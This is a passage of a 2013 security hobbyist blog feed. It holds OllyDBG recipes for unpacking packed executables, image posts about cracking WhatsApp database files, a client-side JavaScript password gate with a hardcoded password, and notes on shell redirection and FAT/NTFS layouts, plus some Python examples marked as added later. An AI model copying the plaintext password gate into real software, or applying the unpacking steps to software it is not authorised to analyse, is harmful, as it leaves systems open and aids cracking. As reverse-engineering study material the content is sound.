PoiNtEr-> (feed updated 2024-03-13)
Difference between a dream and an aim.
A dream requires soundless sleep,
whereas an aim requires sleepless efforts.
Author: Anonymous (http://www.blogger.com/profile/18277613292156954188)

Metasploit Auxiliary Module List (posted 2013-04-02)
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://docs.google.com/file/d/0B3t7-cmGCHS9SGhqMHlIeVpHdTQ/edit?usp=sharing" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFyBNPV8ft5yEDyUK8cV-DD3-Vhdz3dP7U34u6zon92VvxccA_grg0IV2zHQSm-fttJKqHdJ4DcEi-yvfSnTuRrHUdz5yvMV0kA-bdqH3nQj09HDKlB_SMmWZ-8RiDQgZ4ZzGJDh6YvsPs/s1600/top-10-list.jpg" height="640" width="492" /></a></div>
<br /></div>
How to Unpack Various EXE Packers using OllyDBG (posted 2013-03-08)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div id="post_message_3335" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;">
<div style="text-align: center;">
<b>How to Unpack Various EXE Packers using OllyDBG</b></div>
<br />------------------------------------------------------------------------<br />ASPack 2.12:<br /><br />Load the exe, you will have to Shift+F9 several times. Upwards of 50<br />times is normal. Use Ctrl+G ESP BP technique. You'll land on a JNZ.<br />Trace into jump, it is pushing the oep. Trace into the ret. This<br />is the OEP. Dump then fix IAT. Fix dump. done.<br /><br />------------------------------------------------------------------------<br />EZIP 1.0:<br /><br />You start out on a JMP, trace into it. Ctrl+F9 (exec til ret). Scroll<br />down and you should find a large loop. Past that, there is a JMP EAX.<br />Trace into this JMP, this is the OEP. Dump, fix IAT, fix dump.<br /><br />------------------------------------------------------------------------<br />Neolite 2.0:<br /><br />Scroll down until you see JMP EAX. Put BP here. Step into<br />JMP. You're at the OEP. Dump and rebuild just as you would<br />with UPX.<br /><br />------------------------------------------------------------------------<br />PE-PaCK 1.0:<br /><br />You start on a JE with JMP right below it. Trace into the JMP. Now<br />you're on a PUSHAD. Use the Dump window Ctrl+G esp bp. You stop on<br />a JMP EAX. Trace into the JMP and you're at the OEP. Dump, rebuild<br />IAT, fix dump. Done.<br /><br />------------------------------------------------------------------------<br />Petite 2.2:<br /><br />Trace until you go over the PUSHAD. Click in dump window. Ctrl+G.<br />Type ESP. Select first two bytes in dump, set breakpoint on memory<br />access -> word. Back in CPU window, hit F9. Shift+F9 until you<br />reach POPAD/POPFW. There should be a JMP soon after the POP. Trace<br />into the JMP, this is the OEP. Dump process with LordPE. Open process<br />with imprec. Set correct OEP/IAT autotrace. Hit show invalid. Right<br />click and do a level 1. 
Fix the dump.<br /><br /><br />------------------------------------------------------------------------<br />UPX:<br /><br />Scroll down until you reach something that looks like this:<br /><br />004142C7 > 61 POPAD<br />004142C8 .-E9 BE6CFFFF JMP wrap.0040AF8B<br />004142CD 00 DB 00<br />004142CE 00 DB 00<br /><br />Set a breakpoint on the JMP and run. Step into the JMP.<br />You're at the OEP. Dump with LordPE. Open process<br />with impRec. Set OEP with the one you just found.<br />Hit IAT AutoSearch. Hit Get Imports. Delete the bad<br />thunks. Fix the dump. Done.<br /><br />------------------------------------------------------------------------<br /><br />OEP Finding Techniques<br /><br />#1: just scroll down until you see<br />0040E23F .-E9 A479FFFF JMP upxs306.00405BE8<br />0040E244 5CE24000 DD upxs306.0040E25C<br />0040E248 60E24000 DD upxs306.0040E260<br />0040E24C C8734000 DD upxs306.004073C8<br /><br />JMP and some shit with a bunch of 0's.<br /><br />#2<br />F7 on the PUSHAD<br />go to the dump<br />CTRL + G<br />go to ESP<br />Set a hardware breakpoint on WORD<br />that will take you straight to the jump<br /><br />#3<br />F7 onto the PUSHAD<br />ctrl + T<br />COMMAND is one of the following "POPAD"<br />then CTRL + F11</div>
<div>
<br /></div>
</div>
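For analysts triaging a packed sample, the POPAD / JMP pair in the UPX listing above can be checked statically. The following is an added example, not code from the original post: it decodes the E9 rel32 displacement to recover the jump destination (the OEP in the listings) and scans a buffer for the adjacent POPAD; JMP pattern. The function names and the filler bytes in the sample buffer are assumptions made for illustration; the instruction bytes and addresses are the ones shown in the post.

```python
import struct

POPAD = 0x61       # opcode shown at 004142C7 in the post
JMP_REL32 = 0xE9   # opcode of the 5-byte near jump shown at 004142C8


def jmp_rel32_target(insn_va, insn_bytes):
    """Return the destination of an E9 rel32 JMP located at address insn_va."""
    if len(insn_bytes) < 5 or insn_bytes[0] != JMP_REL32:
        raise ValueError("not an E9 rel32 JMP")
    # The displacement is a signed 32-bit little-endian value,
    # relative to the address of the *next* instruction (insn_va + 5).
    (rel,) = struct.unpack_from("<i", insn_bytes, 1)
    return (insn_va + 5 + rel) & 0xFFFFFFFF


def find_tail_jumps(code, base_va):
    """List (jmp_va, target_va) for every POPAD directly followed by a
    backward E9 JMP. Heuristic only: it matches the layout in the post's
    listings, where the stub jumps back to lower addresses."""
    hits = []
    for off in range(len(code) - 5):
        if code[off] == POPAD and code[off + 1] == JMP_REL32:
            jmp_va = base_va + off + 1
            target = jmp_rel32_target(jmp_va, code[off + 1:off + 6])
            if target < jmp_va:
                hits.append((jmp_va, target))
    return hits


# Sample buffer: three constructed NOP filler bytes, then the bytes from the
# post's UPX listing (61 / E9 BE6CFFFF / 00 00), placed so POPAD is at 004142C7.
SAMPLE = b"\x90\x90\x90" + bytes.fromhex("61 e9 be 6c ff ff 00 00")
SAMPLE_BASE = 0x004142C4

if __name__ == "__main__":
    for jmp_va, target in find_tail_jumps(SAMPLE, SAMPLE_BASE):
        print("JMP at %08X -> candidate OEP %08X" % (jmp_va, target))
    # Second listing in the post: E9 A479FFFF at 0040E23F.
    print("%08X" % jmp_rel32_target(0x0040E23F, bytes.fromhex("e9a479ffff")))
```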
Cryptography ebook (posted 2013-02-25)
<div dir="ltr" style="text-align: left;" trbidi="on">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://www.4shared.com/office/h6em5n-R/Introduction_to_Modern_Cryptog.html" style="margin-left: auto; margin-right: auto;" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7F1tpRY6VxwM1jN49zFojgPd9JOPZY1DdFWEz44c5EhwlKEaKT91NqwgVVGdrvbBqNWY7UL_UP4aKp8yX9rgWRsOuGQs2groM7QLQHyYcJxvKUjtpWIUBxaQBziNRTaks8rYNMjeIlDV7/s1600/1Backdoor.Bot.jpg" height="265" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.4shared.com/office/h6em5n-R/Introduction_to_Modern_Cryptog.html" target="_blank">Click Here</a></td></tr>
</tbody></table>
<br /></div>
Crack WhatsApp Database file encrypted with AES-128 (posted 2013-02-24)
<div dir="ltr" style="text-align: left;" trbidi="on">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM87vk0Ul8RJvl9ojM5hbS9SO7l9b6jdxxV1wQ-C7JagyIHV2XYuqJgnzZp19owcswHoJxvLBdS7p6MDauAnP-YeNtu7aPy1SpxY7Rzf8jLEo7FIaOZ6sTOQvYZYVSRLEXPVf4CszOz976/s1600/watsapp1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM87vk0Ul8RJvl9ojM5hbS9SO7l9b6jdxxV1wQ-C7JagyIHV2XYuqJgnzZp19owcswHoJxvLBdS7p6MDauAnP-YeNtu7aPy1SpxY7Rzf8jLEo7FIaOZ6sTOQvYZYVSRLEXPVf4CszOz976/s1600/watsapp1.png" height="330" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Crack db.crypt files of WhatsApp</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKFDT9ohDwNhcBuisatKRHNYOibYK_KivLADJnqULzUe8qedEcksfbU6nZNDRJCvvlTlNy6Rz5ZmqnBlCjzzmRV6eQJ19xyhWtGJ2fQWy5lBpuRy3AA5OnwDWtF11ounkBdpVeVgFxTho/s1600/watsapp.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKFDT9ohDwNhcBuisatKRHNYOibYK_KivLADJnqULzUe8qedEcksfbU6nZNDRJCvvlTlNy6Rz5ZmqnBlCjzzmRV6eQJ19xyhWtGJ2fQWy5lBpuRy3AA5OnwDWtF11ounkBdpVeVgFxTho/s1600/watsapp.png" height="290" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">WhatsApp database</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9HIqNp2iOlsdAv_0jPXtURhgzxGyVsAwj7KofUMYvHAPEwPugHb6tD_nxuJlSI6MmBZHJSxSS2jcdHBCj1_sjFp0IKMMxS5K7xcd9IHPS29p-yj4xVT0JVhLv9fB7LCAEIbN9sy2lkVMy/s1600/watsapp2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9HIqNp2iOlsdAv_0jPXtURhgzxGyVsAwj7KofUMYvHAPEwPugHb6tD_nxuJlSI6MmBZHJSxSS2jcdHBCj1_sjFp0IKMMxS5K7xcd9IHPS29p-yj4xVT0JVhLv9fB7LCAEIbN9sy2lkVMy/s1600/watsapp2.png" height="242" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted Messages</td></tr>
</tbody></table>
<br /></div>
What does "> /dev/null 2>&1" mean? (posted 2013-02-24)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
<b>> /dev/null 2>&1</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ueBRc3h_8n6-llLi_U6ZtdCpKdOvPe0wwqbbeItFzHR7s_wlQpRrbd3jVBc3KxYTkKvQJYK41Jv8MHcwtPBP5-qr-R65sBIq0FebKa1NCvfJVvSaqxc3QHyBfCp-fSN1CxSbVL4Q9UjI/s1600/bash.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ueBRc3h_8n6-llLi_U6ZtdCpKdOvPe0wwqbbeItFzHR7s_wlQpRrbd3jVBc3KxYTkKvQJYK41Jv8MHcwtPBP5-qr-R65sBIq0FebKa1NCvfJVvSaqxc3QHyBfCp-fSN1CxSbVL4Q9UjI/s1600/bash.jpg" height="240" width="320" /></a></div>
<br />
You need to understand the theory first, and then it's up to you how and where you apply it. I'll try to explain the command above.<br />
<br />
The greater-than sign (>) in commands like this redirects the program’s output somewhere. In this case, something is being redirected into /dev/null, and something is being redirected into &1.<br />
<br />
Standard in, out and error:<br />
<br />
There are three standard sources of input and output for a program. Standard input usually comes from the keyboard if it’s an interactive program, or from another program if it’s processing the other program’s output. The program usually prints to standard output, and sometimes prints to standard error. These three file descriptors (you can think of them as “data pipes”) are often called STDIN, STDOUT, and STDERR.<br />
<br />
Sometimes they’re not named, they’re numbered! The built-in numberings for them are 0, 1, and 2, in that order. By default, if you don’t name or number one explicitly, you’re talking about STDOUT.<br />
<br />
That means file descriptor 0 (fd0) denotes STDIN, or standard input; file descriptor 1 (fd1) denotes STDOUT, or standard output; and file descriptor 2 (fd2) denotes STDERR, or standard error.<br />
<br />
You can see the command above is redirecting standard output into /dev/null, which is a place you can dump anything you don’t want (often called the bit-bucket), then redirecting standard error into standard output (you have to put an & in front of the destination when you do this).<br />
<br />
The short explanation, therefore, is “all output from this command should be shoved into a black hole.” That’s one good way to make a program be really quiet!<br />
<br />
</div>
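What the shell does for each redirection, shown with the underlying descriptor operations. This is an added example, not part of the original post: `fd>file` opens the file and duplicates it onto the descriptor, and `fd>&n` duplicates descriptor n onto it. It goes one step beyond the text by also running the two redirections in the opposite order, which does not silence the command. The names `CHILD`, `run` and the constants are assumptions made for this illustration.

```python
import os
import subprocess

# Constructed child command: one line on STDOUT (fd 1), one on STDERR (fd 2).
CHILD = ["sh", "-c", "echo out; echo err >&2"]


def run(redirects):
    """Run CHILD with `redirects` applied left to right, as the shell does.

    Each redirect is (fd, target):
      a str target means  fd>target   (open the file, put it on fd)
      an int target means fd>&target  (make fd a copy of that descriptor)
    Returns (bytes that reached our stdout pipe, bytes that reached our stderr pipe).
    """
    def apply():
        # Runs in the child after fds 1 and 2 are connected to the pipes
        # and before the command is executed.
        for fd, target in redirects:
            if isinstance(target, int):
                os.dup2(target, fd)
            else:
                new = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o644)
                os.dup2(new, fd)
                os.close(new)

    proc = subprocess.run(CHILD, stdout=subprocess.PIPE,
                          stderr=subprocess.PIPE, preexec_fn=apply)
    return proc.stdout, proc.stderr


# > /dev/null 2>&1 : fd 1 goes to /dev/null, then fd 2 becomes a copy of fd 1.
QUIET = [(1, "/dev/null"), (2, 1)]
# 2>&1 > /dev/null : fd 2 copies the *old* fd 1 first, so errors still escape.
SWAPPED = [(2, 1), (1, "/dev/null")]

if __name__ == "__main__":
    print("no redirection    :", run([]))
    print("> /dev/null       :", run([(1, "/dev/null")]))
    print("> /dev/null 2>&1  :", run(QUIET))
    print("2>&1 > /dev/null  :", run(SWAPPED))
```

With the full form, error messages are discarded as well, so a job silenced this way gives no indication when it fails.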
Nidhi Verma's Blog: Buffer (posted 2013-02-22)
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQV9mVLHyCd9FbjdbkEuR0LlPvYBqbkdUFu8duWzpQqJ8OOIK3UugwpLCrDlFuKn70UvvcUQt7p6zO-_Zbn8JIcWYp81b2hcioftF2Hp8sebsPyIJxnh8h_BBCmfOVJEwtQhXh1jc3OubE/s1600/29012_560602520652009_1155748196_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQV9mVLHyCd9FbjdbkEuR0LlPvYBqbkdUFu8duWzpQqJ8OOIK3UugwpLCrDlFuKn70UvvcUQt7p6zO-_Zbn8JIcWYp81b2hcioftF2Hp8sebsPyIJxnh8h_BBCmfOVJEwtQhXh1jc3OubE/s1600/29012_560602520652009_1155748196_n.jpg" height="300" width="400" /></a></div>
<div style="text-align: center;">
<span style="font-size: large;"><b style="background-color: #0b5394;">http://nidhi--verma.blogspot.com</b></span></div>
</div>
What happens when you format a disk? (posted 2013-02-07)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBMiFZzLuQHxrnUnhUgVclvd0FgG_PQ80EhtUkXU_4c78sdbOzVvpQoCWlBCq8s27TcFA0LijF4q7MJ6BXltl_iALTjWkPlL7HaiaajRMMVrIoM23H2TChgSqwipW6LshVh6dIyUDAXR6q/s1600/NEC_D5662_Hard_disk.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBMiFZzLuQHxrnUnhUgVclvd0FgG_PQ80EhtUkXU_4c78sdbOzVvpQoCWlBCq8s27TcFA0LijF4q7MJ6BXltl_iALTjWkPlL7HaiaajRMMVrIoM23H2TChgSqwipW6LshVh6dIyUDAXR6q/s1600/NEC_D5662_Hard_disk.jpg" height="300" width="400" /></a></div>
<div class="profile vcard" id="profile-AA11991317">
<span style="font-family: Trebuchet MS, sans-serif;"> </span></div>
<div class="profile vcard" id="profile-AA11991317">
<span style="font-family: Trebuchet MS, sans-serif;">A new disk is like a blank sheet of paper. When it is formatted, it becomes organized into numbered blocks, with an index of what is in each block and which blocks are free to write to.</span></div>
<div class="qa-container" id="yui_3_3_0_1_1360257731480159">
<div class="content" id="yui_3_3_0_1_1360257731480158">
<span style="font-family: Trebuchet MS, sans-serif;">Each format type organizes the disk into a certain number of blocks of a certain size so that it can quickly read from and write to each block.<br />The index and the numbering system use space on the disk. So even though the empty disk is 100% of its size, the formatted size is 90% or something.<br />When you format an old disk, there are two ways to do it. A 'quick format' just erases the index, so the system thinks it can write to every block; this leaves all the old information on the disk. A 'deep format' erases everything and starts over with no information on the disk. A <span class="yshortcuts cs4-visible" id="lw_1360257722_0">disk recovery</span> application can easily find information on a quick formatted disk.</span></div>
</div>
</div>
FAT FILESYSTEM (posted 2013-01-29)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<h2 style="text-align: center;">
<a href="" name="s1"><span style="font-size: large;">FAT</span></a></h2>
The traditional DOS filesystem types are FAT12 and FAT16. Here FAT stands for File Allocation Table: the disk is divided into <i>clusters</i>, the unit used by the file allocation, and the FAT describes which clusters are used by which files.<br />
<br />
<span style="font-family: inherit;"><b>Layout</b></span><br />
<span style="font-family: inherit;">First the boot sector (at relative address 0), and possibly other stuff. Together these are the Reserved Sectors. Usually the boot sector is the only reserved sector.</span><br />
<span style="font-family: inherit;">Then the FATs (following the reserved sectors; the number of reserved sectors is given in the boot sector, bytes 14-15; the length of a sector is found in the boot sector, bytes 11-12).</span><br />
<span style="font-family: inherit;">Then the Root Directory (following the FATs; the number of FATs is given in the boot sector, byte 16; each FAT has a number of sectors given in the boot sector, bytes 22-23).</span><br />
<span style="font-family: inherit;">Finally the Data Area (following the root directory; the number of root directory entries is given in the boot sector, bytes 17-18, and each directory entry takes 32 bytes; space is rounded up to entire sectors).</span><br />
<br />
<h2>
<a href="" name="ss1.2"><span style="font-family: inherit; font-size: small;">Boot sector</span></a></h2>
<span style="font-family: inherit;">The first sector (512 bytes) of a FAT filesystem is the <i>boot sector</i>. In Unix-like terminology this would be called the superblock. It contains some general information.</span><br />
<span style="font-family: inherit;">First an explicit example (of the boot sector of a DRDOS boot floppy).</span><br />
<pre><span style="font-family: inherit;">0000000 eb 3f 90 49 42 4d 20 20 33 2e 33 00 02 01 01 00
0000020 02 e0 00 40 0b f0 09 00 12 00 02 00 00 00 00 00
0000040 00 00 00 00 00 00 00 00 00 00 70 00 ff ff 49 42
0000060 4d 42 49 4f 20 20 43 4f 4d 00 50 00 00 08 00 18
...
</span></pre>
<span style="font-family: inherit;">(See <a href="http://www.win.tue.nl/~aeb/linux/fs/fat/bootsector.drdos">here</a> for the complete sector, and also an <a href="http://www.win.tue.nl/~aeb/linux/fs/fat/bootsector.msdos">MSDOS example</a>.)</span><br />
<span style="font-family: inherit;">The 2-byte numbers are stored little endian (low order byte first).</span><br />
<span style="font-family: inherit;">Here is the FAT12 version, which is also the common part of the FAT12, FAT16 and FAT32 boot sectors. See further below.</span><br />
<pre><span style="font-family: inherit;">Bytes    Content
0-2      Jump to bootstrap (E.g. eb 3c 90; on i86: JMP 003E NOP.
         One finds either eb xx 90, or e9 xx xx.
         The position of the bootstrap varies.)
3-10     OEM name/version (E.g. "IBM  3.3", "IBM 20.0", "MSDOS5.0", "MSWIN4.0".
         Various format utilities leave their own name, like "CH-FOR18".
         Sometimes just garbage. Microsoft recommends "MSWIN4.1".)
         /* BIOS Parameter Block starts here */
11-12    Number of bytes per sector (512)
         Must be one of 512, 1024, 2048, 4096.
13       Number of sectors per cluster (1)
         Must be one of 1, 2, 4, 8, 16, 32, 64, 128.
         A cluster should have at most 32768 bytes. In rare cases 65536 is OK.
14-15    Number of reserved sectors (1)
         FAT12 and FAT16 use 1. FAT32 uses 32.
16       Number of FAT copies (2)
17-18    Number of root directory entries (224)
         0 for FAT32. 512 is recommended for FAT16.
19-20    Total number of sectors in the filesystem (2880)
         (in case the partition is not FAT32 and smaller than 32 MB)
21       Media descriptor type (f0: 1.4 MB floppy, f8: hard disk; see below)
22-23    Number of sectors per FAT (9)
         0 for FAT32.
24-25    Number of sectors per track (12)
26-27    Number of heads (2, for a double-sided diskette)
28-29    Number of hidden sectors (0)
         Hidden sectors are sectors preceding the partition.
         /* BIOS Parameter Block ends here */
30-509   Bootstrap
510-511  Signature 55 aa
</span></pre>
<span style="font-family: inherit;">The signature is found at offset 510-511. This will be the end of the sector only in case the sector size is 512.</span><br />
</div>
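The field table and the Layout section above, applied to the DR-DOS dump from the post. This is an added example, not code from the original page: it decodes bytes 0-29, rejects values the table does not allow (a boot sector from an untrusted image should never be fed straight into offset arithmetic), and derives where the FATs, root directory and data area start. The function and dictionary key names are assumptions made for this illustration; the 32 input bytes are the first two lines of the dump shown above.

```python
import struct

# First 32 bytes of the DR-DOS boot floppy sector, copied from the dump in the post.
DRDOS_HEAD = bytes.fromhex(
    "eb 3f 90 49 42 4d 20 20 33 2e 33 00 02 01 01 00 "
    "02 e0 00 40 0b f0 09 00 12 00 02 00 00 00 00 00"
)

# Bytes 0-29 as listed in the field table; "<" = little endian, no padding.
_BPB = struct.Struct("<3s8sHBHBHHBHHHH")
_FIELDS = ("jump", "oem", "bytes_per_sector", "sectors_per_cluster",
           "reserved_sectors", "fat_copies", "root_entries", "total_sectors",
           "media", "sectors_per_fat", "sectors_per_track", "heads",
           "hidden_sectors")


def parse_fat_boot_sector(sector):
    """Decode the FAT12/FAT16 boot sector fields and compute the layout in sectors."""
    if len(sector) < _BPB.size:
        raise ValueError("need at least 30 bytes of boot sector")
    bs = dict(zip(_FIELDS, _BPB.unpack_from(sector)))
    bs["oem"] = bs["oem"].decode("ascii", "replace")

    # Validate everything that is used in the arithmetic below.
    jump = bs["jump"]
    if not ((jump[0] == 0xEB and jump[2] == 0x90) or jump[0] == 0xE9):
        raise ValueError("no jump to bootstrap at offset 0")
    if bs["bytes_per_sector"] not in (512, 1024, 2048, 4096):
        raise ValueError("invalid bytes per sector")
    if bs["sectors_per_cluster"] not in (1, 2, 4, 8, 16, 32, 64, 128):
        raise ValueError("invalid sectors per cluster")
    if bs["reserved_sectors"] < 1 or bs["fat_copies"] < 1:
        raise ValueError("no reserved sectors or no FAT")
    if bs["root_entries"] == 0 or bs["sectors_per_fat"] == 0:
        raise ValueError("fields are 0 as on FAT32; not handled by this example")
    # The signature can only be checked when the whole sector is available.
    if len(sector) >= 512 and sector[510:512] != b"\x55\xaa":
        raise ValueError("missing 55 aa signature")

    # Layout: reserved sectors, then the FATs, then the root directory
    # (32 bytes per entry, rounded up to whole sectors), then the data area.
    fat_start = bs["reserved_sectors"]
    root_start = fat_start + bs["fat_copies"] * bs["sectors_per_fat"]
    root_sectors = -(-(bs["root_entries"] * 32) // bs["bytes_per_sector"])
    data_start = root_start + root_sectors
    if bs["total_sectors"] and data_start >= bs["total_sectors"]:
        raise ValueError("metadata does not fit inside the filesystem")
    bs["layout"] = {"fat_start": fat_start, "root_start": root_start,
                    "root_sectors": root_sectors, "data_start": data_start}
    return bs


if __name__ == "__main__":
    info = parse_fat_boot_sector(DRDOS_HEAD)
    for name in _FIELDS[1:]:
        print("%-20s %r" % (name, info[name]))
    print(info["layout"])
```

Bytes 24-25 of the dump are `12 00`, that is hexadecimal 12, so the decoded sectors-per-track value is 18.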
Crack Password !! (posted 2013-01-27)
<div dir="ltr" style="text-align: left;" trbidi="on">
<script language="JavaScript">
<!--hide
var password;
var pass1="toor";
password=prompt('Please enter your password to view this page!',' ');
if (password==pass1)
alert('Password Correct! Click OK to enter!');
else
{
window.location="http://vishal--mishra.blogspot.in/2013/01/siocsifaddr-no-such-device-error-while.html";
}
//</script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzd6d6ja3uQZyr4L3do-i_XdRMDnp1BSRwIJ6WJvrixE6gnnI3ZTdcvG0xEv-a4Kufl-Y2bjswGJVX9mzRX6YeNi3L79eA97YER1eFuaAckF28WIMOuW5a_IpVOBfhRojvoCqT_QweQHXl/s1600/password-cracking.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzd6d6ja3uQZyr4L3do-i_XdRMDnp1BSRwIJ6WJvrixE6gnnI3ZTdcvG0xEv-a4Kufl-Y2bjswGJVX9mzRX6YeNi3L79eA97YER1eFuaAckF28WIMOuW5a_IpVOBfhRojvoCqT_QweQHXl/s320/password-cracking.jpg" height="480" width="640" /></a></div>
</div>
SIOCSIFADDR: No such device (ERROR while getting interface flags) (posted 2013-01-19)
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<b><span style="font-size: large;">SIOCSIFADDR: No such device eth0: ERROR while getting interface flags: No such device</span></b></div>
<div style="text-align: center;">
<b><span style="font-size: large;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCHi73wMGagPclxqiTibt7xwAj5DTBz0L6vxm9cZqFM3n-pvyHKGbp3RX4EhGYEx0LlJSh5YIHN-J2gd7IS4_LPvf43PFvm_HmlDUFArdOrul1oPO6huR63eiDeHL7HJF_7sMpv4DaesFz/s1600/device.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCHi73wMGagPclxqiTibt7xwAj5DTBz0L6vxm9cZqFM3n-pvyHKGbp3RX4EhGYEx0LlJSh5YIHN-J2gd7IS4_LPvf43PFvm_HmlDUFArdOrul1oPO6huR63eiDeHL7HJF_7sMpv4DaesFz/s400/device.png" width="400" /></a></div>
<div style="text-align: center;">
<b><span style="font-size: large;"><br /></span></b></div>
Each time you assign a new MAC address (in the VMware guest settings), udev in Debian and Ubuntu guests assigns a new eth number. To remove this error:<br />
<b>1:</b> edit /etc/udev/rules.d/70-persistent-net.rules, or<br />
<b>2:</b> delete the file (it will be recreated at every boot).<br />
I would suggest option 2; before doing so, make a backup of the 70-persistent-net.rules file.<br />
<br />
<br /></div>
NTFS Partition (posted 2013-01-14)
<div dir="ltr" style="text-align: left;" trbidi="on">
When you format an NTFS volume, the format program allocates the first 16 sectors for the $Boot metadata file. The first sector is, in fact, a boot sector with "bootstrap" code, and the following 15 sectors are the boot sector's IPL (initial program loader). To increase file system reliability, the very last sector of an NTFS partition contains a spare copy of the boot sector.<br />
On NTFS volumes, the data fields that follow the BPB form an extended BPB. The data in these fields enables Ntldr (NT loader program) to find the master file table (MFT) during startup. On NTFS volumes, the MFT is not located in a predefined sector, as on FAT16 and FAT32 volumes. For this reason, the MFT can be moved if there is a bad sector in its normal location. However, if the data is corrupted, the MFT cannot be located, and Windows NT/2000 assumes that the volume has not been formatted. The following example illustrates the boot sector of an NTFS volume formatted while running Windows 2000. The printout is formatted in three sections: bytes 0x00-0x0A are the jump instruction and the OEM ID; bytes 0x0B-0x53 are the BPB and the extended BPB; the remaining code is the bootstrap code and the end of sector marker.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUFDbx87H12cMsGNBtIwc04hweony6v4UrryHp5uMtnDd-_puN2Sd3E_Fc3VjgT_KclILo93rHXkBD2zRTULqfyn6Sbyjj9K_mutTmLQUrbQau22yuj2SECXNOvYN_l0qWArrWiiOpkwB_/s1600/ntfs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUFDbx87H12cMsGNBtIwc04hweony6v4UrryHp5uMtnDd-_puN2Sd3E_Fc3VjgT_KclILo93rHXkBD2zRTULqfyn6Sbyjj9K_mutTmLQUrbQau22yuj2SECXNOvYN_l0qWArrWiiOpkwB_/s320/ntfs.jpg" width="320" /></a></div>
<br />
Each file on an NTFS volume is represented by a record in a special file called the master file table (MFT). NTFS reserves the first 16 records of the table for special information. The first record of this table describes the master file table itself, followed by a MFT mirror record. If the first MFT record is corrupted, NTFS reads the second record to find the MFT mirror file, whose first record is identical to the first record of the MFT. The locations of the data segments for both the MFT and MFT mirror file are recorded in the boot sector.<br />
<div class="separator" style="clear: both; text-align: center;">
